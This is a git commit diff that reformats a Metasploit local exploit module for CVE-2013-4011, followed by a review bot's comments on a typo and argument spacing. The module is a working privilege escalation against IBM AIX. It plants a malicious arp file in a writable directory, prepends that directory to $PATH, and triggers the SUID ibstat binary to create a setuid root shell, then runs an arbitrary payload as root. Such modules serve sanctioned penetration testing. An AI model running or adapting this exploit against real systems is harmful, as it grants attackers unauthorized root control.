Normalize syntax and whitespace
parent
8611526a01
commit
6c67f1881f
|
@ -4,59 +4,58 @@
|
|||
##
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Local
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'ibstat $PATH Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module exploits the trusted $PATH environment variable of the SUID binary 'ibstat'.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Kristian Erik Hermansen', #original author
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #Metasploit module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-4011' ],
|
||||
[ 'OSVDB', '95420' ],
|
||||
[ 'BID', '61287' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
|
||||
],
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'perl',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'IBM AIX Version 6.1', {} ],
|
||||
[ 'IBM AIX Version 7.1', {} ],
|
||||
],
|
||||
'DefaultTarget' => 1,
|
||||
'DisclosureDate'=> "Sep 24 2013",
|
||||
))
|
||||
register_options([
|
||||
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
||||
], self.class)
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
"Name" => "ibstat $PATH Privilege Escalation",
|
||||
"Description" => %q{
|
||||
This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
|
||||
},
|
||||
"Author" => [
|
||||
"Kristian Erik Hermansen", #original author
|
||||
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
|
||||
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
|
||||
],
|
||||
"References" => [
|
||||
["CVE", "2013-4011"],
|
||||
["OSVDB", "95420"],
|
||||
["BID", "61287"],
|
||||
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
|
||||
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
|
||||
],
|
||||
"Platform" => ["unix"],
|
||||
"Arch" => ARCH_CMD,
|
||||
"Payload" => {
|
||||
"Compat" => {
|
||||
"PayloadType" => "cmd",
|
||||
"RequiredCmd" => "perl"
|
||||
}
|
||||
},
|
||||
"Targets" => [
|
||||
["IBM AIX Version 6.1", {}],
|
||||
["IBM AIX Version 7.1", {}]
|
||||
],
|
||||
"DefaultTarget" => 1,
|
||||
"DisclosureDate" => "Sep 24 2013"
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
find_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if find_output.include? "ibstat"
|
||||
find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
|
||||
|
||||
if find_output.include?("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
@ -88,60 +87,74 @@ chmod 4555 #{root_file}
|
|||
if gcc_installed?
|
||||
print_status("Dropping file #{root_file}.c...")
|
||||
write_file("#{root_file}.c", c_file)
|
||||
|
||||
print_status("Compiling source...")
|
||||
cmd_exec "gcc -o #{root_file} #{root_file}.c"
|
||||
cmd_exec("gcc -o #{root_file} #{root_file}.c")
|
||||
print_status("Compilation completed")
|
||||
|
||||
register_file_for_cleanup("#{root_file}.c")
|
||||
else
|
||||
cmd_exec "cp /bin/sh #{root_file}"
|
||||
cmd_exec("cp /bin/sh #{root_file}")
|
||||
end
|
||||
register_file_for_cleanup("#{root_file}")
|
||||
|
||||
register_file_for_cleanup(root_file)
|
||||
|
||||
print_status("Writing custom arp file...")
|
||||
write_file("#{arp_file}",arp)
|
||||
register_file_for_cleanup("#{arp_file}")
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
write_file(arp_file,arp)
|
||||
register_file_for_cleanup(arp_file)
|
||||
cmd_exec("chmod 0555 #{arp_file}")
|
||||
print_status("Custom arp file written")
|
||||
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
|
||||
cmd_exec 'export PATH'
|
||||
path_env = cmd_exec("echo $PATH")
|
||||
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
|
||||
cmd_exec("export PATH")
|
||||
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")
|
||||
|
||||
# The $PATH variable must be restored before the payload is executed
|
||||
# in cases where an euid root shell was gained
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
|
||||
cmd_exec "#{root_file}"
|
||||
print_status("Restoring $PATH environment variable...")
|
||||
cmd_exec("PATH=#{path_env}")
|
||||
cmd_exec("export PATH")
|
||||
|
||||
cmd_exec(root_file)
|
||||
print_status("Checking root privileges...")
|
||||
|
||||
if is_root?
|
||||
print_status("Executing payload...")
|
||||
cmd_exec "#{payload.encoded}"
|
||||
cmd_exec(payload.encoded)
|
||||
end
|
||||
end
|
||||
|
||||
def gcc_installed?
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_whereis_output = cmd_exec "whereis -b gcc"
|
||||
if gcc_whereis_output.include? "/"
|
||||
gcc_whereis_output = cmd_exec("whereis -b gcc")
|
||||
|
||||
if gcc_whereis_output.include?("/")
|
||||
print_good("gcc found!")
|
||||
return true
|
||||
end
|
||||
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
|
||||
def is_root?
|
||||
id_output = cmd_exec "id"
|
||||
if id_output.include? "euid=0(root)"
|
||||
id_output = cmd_exec("id")
|
||||
|
||||
if id_output.include?("euid=0(root)")
|
||||
print_good("Got root! (euid)")
|
||||
return true
|
||||
end
|
||||
if id_output.include? "uid=0(root)"
|
||||
if id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
return true
|
||||
end
|
||||
|
||||
print_status("Exploit failed")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
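Review bot: The status string on the new side of the second hunk still reads `print_status("Triggering vulnerablity...")` — the line is rewritten to add parentheses but the typo in the user-facing message survives, so `print_status("Triggering vulnerability...")` would complete the normalization this commit sets out to do. The same hunk leaves `write_file(arp_file,arp)` without a space after the comma, which is inconsistent with the argument spacing applied everywhere else in the change (for example `write_file("#{root_file}.c", c_file)`); `write_file(arp_file, arp)` would match. The enclosing method of that hunk begins before its first visible line, so its signature and the earlier part of its body are not shown here.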